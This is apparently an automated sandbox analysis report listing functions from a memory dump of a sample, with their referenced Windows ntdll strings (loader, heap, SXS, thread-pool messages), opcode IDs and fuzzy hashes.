Instruction Fuzzy Hash: F7C1BA70108392CFD721DF59C144B6AFBE4FF94304F0489AAF9968BA51E334CA4ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 01758402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 01758422
minkernel\ntdll\ldrinit.c, xrefs: 01758421
@, xrefs: 01758591
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0175855E

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
Instruction ID: 7253cf5f8024ebf96f597e524b6814d57b616e56a7f8f0c414ea0cbde554013c
Opcode Fuzzy Hash: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
Instruction Fuzzy Hash: D6919B71548345AFDB62DF26CC44FABFAECFB84684F40092EFA8896155E770D9048B63

Uniqueness

Uniqueness Score: -1.00%

Function 0175273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017922B6
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017921D9, 017922B1
.Local, xrefs: 017528D8
SXS: %s() passed the empty activation context, xrefs: 017921DE

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
Instruction ID: fd250eb193926f936f7e31ca75b53a53e3bbd56c612242a5179b674cff0fc357
Opcode Fuzzy Hash: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
Instruction Fuzzy Hash: A2A1BE31944229DBDB65DF68D888BA9F7B0BF58314F2501E9DD08AB352D7709E84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01754AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid flags 0x%08lx, xrefs: 0179342A
RtlDeactivateActivationContext, xrefs: 01793425, 01793432, 01793451
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01793456
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01793437

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
Instruction ID: 07f265c53810513e4e3b694b74ac580ef6125ed54c84b33e5daad3f8c8d1ff76
Opcode Fuzzy Hash: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
Instruction Fuzzy Hash: D0613476604B129BDB22CF2CC885B3AF7E1BF80B50F158559EC569B291E770EC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 017264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017810AE
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01780FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0178106B
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01781028

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
Instruction ID: bcbe1a320d2ebd5edc350c5e78a5339bc746e8df7e7a3d2501e45a3a26cd2abc
Opcode Fuzzy Hash: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
Instruction Fuzzy Hash: 7A71E3B19043159FCB21EF19C888B9BBFA8EF94764F500469FD488B14AD334D589CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0174245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 01742462
LdrpDynamicShimModule, xrefs: 0178A998
minkernel\ntdll\ldrinit.c, xrefs: 0178A9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0178A992

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
Instruction ID: 5b1b71c2057f22ad524ea62e24e14d29c56bae0c563780150a9632fe815c2e8b
Opcode Fuzzy Hash: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
Instruction Fuzzy Hash: 3F312A77640202ABDB31AF5DD885E6AFBB8FB84714F26005AFD01A7249D7B05A41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 017329A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01733264
HEAP[%wZ]: , xrefs: 01733255
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0173327D

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
Instruction ID: 6d9ef0ee985e5aafab084fec2d092322e071d686ca71c999b661f3be137bc984
Opcode Fuzzy Hash: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
Instruction Fuzzy Hash: 63929A71A046499FEB25CF68C444BAEFBF1FF88300F188099E959AB392D735A945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01730770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 017850BD
HEAP[%wZ]: , xrefs: 017850AE
(UCRBlock->Size >= *Size), xrefs: 017850CA

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
Instruction ID: 29321822eee6bba1b9de94d38d6221337ff291e1e0c6ee4fc84571cbb21b5b03
Opcode Fuzzy Hash: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
Instruction Fuzzy Hash: ABF1BE70A40606DFEB25DF68C894B6AF7F5FF84304F1481A8E5169B386D734EA81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01746962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 0178CA51
@, xrefs: 01746C24

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
Instruction ID: 7758d3631844b52ac7abe1bbad1c800a5075a946ea4543a1b62b50a0e955725a
Opcode Fuzzy Hash: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
Instruction Fuzzy Hash: FAC27F716083419FE72ACF28C881BABFBE5AF89754F04896DF999C7241D734D844CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0171A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 0177C1E4
FilterFullPath, xrefs: 0177C2E6
UseFilter, xrefs: 0171A1C1

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
Instruction ID: dc928f80127ced58e0ef87ff949d10475f54df84fb6e50b54ea6b6f822f14ad6
Opcode Fuzzy Hash: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
Instruction Fuzzy Hash: 28A13E7191162A9BDF329F68CC88BE9F7B8EF48710F1041EAD909A7251D7359E84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01740BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

Failed to allocated memory for shimmed module list, xrefs: 0178A10F
minkernel\ntdll\ldrinit.c, xrefs: 0178A121
LdrpCheckModule, xrefs: 0178A117

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
Instruction ID: 6b33cafa93b402765dddbb133e043f63865cef688884d5d85d4d4edb2d82b718
Opcode Fuzzy Hash: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
Instruction Fuzzy Hash: EB71DE71A00206DFDB25EF68C984AFEF7F8FB84204F14406DE942EB255E774AA42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 01730A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01785342
HEAP[%wZ]: , xrefs: 01785335
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0178534D

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
Instruction ID: 2d8cb52d0606861c33f70375b2176dade747ac617b6950b02afe8fd05d503d43
Opcode Fuzzy Hash: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
Instruction Fuzzy Hash: E761CE70600301DFDB29DF28C844B6AFBE1FF85308F148599E4498F296D770E981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0175C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

Failed to reallocate the system dirs string !, xrefs: 017982D7
LdrpInitializePerUserWindowsDirectory, xrefs: 017982DE
minkernel\ntdll\ldrinit.c, xrefs: 017982E8

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
Instruction ID: 69bde59306c79a7395239508ad7fd6823f835fa1ea3607fcc5cc1d038a67e0e1
Opcode Fuzzy Hash: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
Instruction Fuzzy Hash: 4E41F372544305ABD722EB68DC48B5BF7ECEF48A50F10492AF955D3299E7B0D900CB91

Uniqueness

Uniqueness Score: -1.00%

Function 017DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 017DC1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017DC1C5
PreferredUILanguages, xrefs: 017DC212

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
Instruction ID: 2744613aea18f2d4fcb337b72f6fa15084ce138cda665eac1e1fdaa9dd50c5f5
Opcode Fuzzy Hash: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
Instruction Fuzzy Hash: 23416371E0420DEBDB12DAD8C895FEEFBBDAB18700F14416EEA09B7244D774AA44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 017B4160
LdrpResValidateFilePath Exit, xrefs: 017B4172
@, xrefs: 017B4225

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
Instruction ID: f8fa6b3dccd98f52f59df9a17c2f3ca44820691accc96306994187fa7b2ed058
Opcode Fuzzy Hash: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
Instruction Fuzzy Hash: 2A41F431A04658CBEB26DB99C888BEDFBB8FF95340F140469D903EB796D7349941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017A4888
LdrpCheckRedirection, xrefs: 017A488F
minkernel\ntdll\ldrredirect.c, xrefs: 017A4899

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
Instruction ID: 09272011ce66559ef06b665e42738e439b865f3bc093614727b83b3845bac2c1
Opcode Fuzzy Hash: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
Instruction Fuzzy Hash: 5241D332A442919FCB21CE1CE840A26FBE4EFC9A50F49076DED4AD7215D7B2D800CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01730BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0178543E
HEAP[%wZ]: , xrefs: 01785431
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01785449

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
Instruction ID: 675aeddb6bd654cf8152107888ce909b9f089d7b66c6cefb89aa40b4b5abe9e9
Opcode Fuzzy Hash: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
Instruction Fuzzy Hash: 3911AC32395142DFDB29EA1CC859B6AF3A5EF80616F1881A9F40ACB65ADB30D841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 017A2104
Process initialization failed with status 0x%08lx, xrefs: 017A20F3
LdrpInitializationFailure, xrefs: 017A20FA

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
Instruction ID: aba1b627513cf19e9f75397be503d447c436f93d16b0204a25c0910851822c3b
Opcode Fuzzy Hash: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
Instruction Fuzzy Hash: 3FF0FC76780309BBE725D64CDC5AF99B7ACFB81B54F90046DFB00772C6D5B0A640CA51

Uniqueness

Uniqueness Score: -1.00%

Function 017303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01784D8A

Strings

#%u, xrefs: 01784D82

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
Instruction ID: c6dae95a90671388209164b7f2a108ee5cbe164f6dc5b3dfb6bb940baae24d97
Opcode Fuzzy Hash: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
Instruction Fuzzy Hash: 8D715971A0014A9FDB11DFA8C994FAEFBF8BF48704F144065E905E7256EA78EE41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0172A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 0172AA25
LdrResSearchResource Enter, xrefs: 0172AA13

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
Instruction ID: 5c86fc2b37721d00ee9ebf37d6f4eb1811ad5a57431af5b2108e2b5e93df3245
Opcode Fuzzy Hash: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
Instruction Fuzzy Hash: 0BE17E71E40269AFEB22DE9CC984BAEFBBAFF14710F10446AE901E7651D734D942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 017EA44B
`, xrefs: 017EA551

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: bed465f9165ee9c69c1ca7c9f8acdab98f908a023f900b2423c7336cc770c5a9
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: FAC1C1312043429BEB25CF28C849B6BFBE5AFD8318F184A2DF696CB291D774D505CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0179E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0179E751
Legacy, xrefs: 0179E75A

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: c5e99d15303baae47ca3e29a68afa18a987e7220b2fd1f58a5966dfbbbd3f3b9
Instruction ID: 065c3699c00c5f04cb40dc7058710cceebe46d6c75e7407d6f24422f1acb81e7
Opcode Fuzzy Hash: c5e99d15303baae47ca3e29a68afa18a987e7220b2fd1f58a5966dfbbbd3f3b9
Instruction Fuzzy Hash: 5C615871E407199FDB24DFA8D844BAEFBB9FB48700F14406DE649EB291DB31A944CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017C43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 017C4437
MUI, xrefs: 017C4525

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
Instruction ID: f8de8f86df775d5018cd26ca86befbc7f8d8503946e7820aa37758b90c3312ba
Opcode Fuzzy Hash: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
Instruction Fuzzy Hash: 75511871E0021DAEDB11DFA9CC94AEEFBBCEB54B54F100529EA11B7290D7309A05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 017204E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 01720540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0172063D

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
Instruction ID: e28f8e93adf7a3a0787b8c05ee6ac45ee5116a9e94557eb56b6f5c8948f07373
Opcode Fuzzy Hash: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
Instruction Fuzzy Hash: 53519C715047528FD734DF69C544AA7FBE4AF84304F20483EFAAA87241E7749546CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0172A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0172A309
RtlpResUltimateFallbackInfo Enter, xrefs: 0172A2FB

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
Instruction ID: a97f029b315711bd60d75fbc3a913aacd86ffe127a9ecfaecc8e1e0fdcdc8ea5
Opcode Fuzzy Hash: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
Instruction Fuzzy Hash: 2C41CC31A01669DBDB21DF69C844B6EFBB4FF84700F2440A9E900DB693E2B5D941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0175A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 0175A5E9
Cleanup Group, xrefs: 0175A5E4

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
Instruction ID: bee52fb0c18b88431526460da0bd155e611e97da8c9603a898ac1adce85c60f2
Opcode Fuzzy Hash: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
Instruction Fuzzy Hash: 2001F4B2640740AFD351DF24CD49F16B7E8EB94715F058A3DAA49C7190E3B4D904CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0172C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0172C8C3, 0172CA40

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
Instruction ID: 334f0514766d71f5b8d0de6f656e11b61c361e683e0fd138e9c2815f41c2e950
Opcode Fuzzy Hash: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
Instruction Fuzzy Hash: DC826B75E002288FEB25CFA9C884BEDFBB5FF58310F148169D959AB355D7309982CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017A6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 017A65C1

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
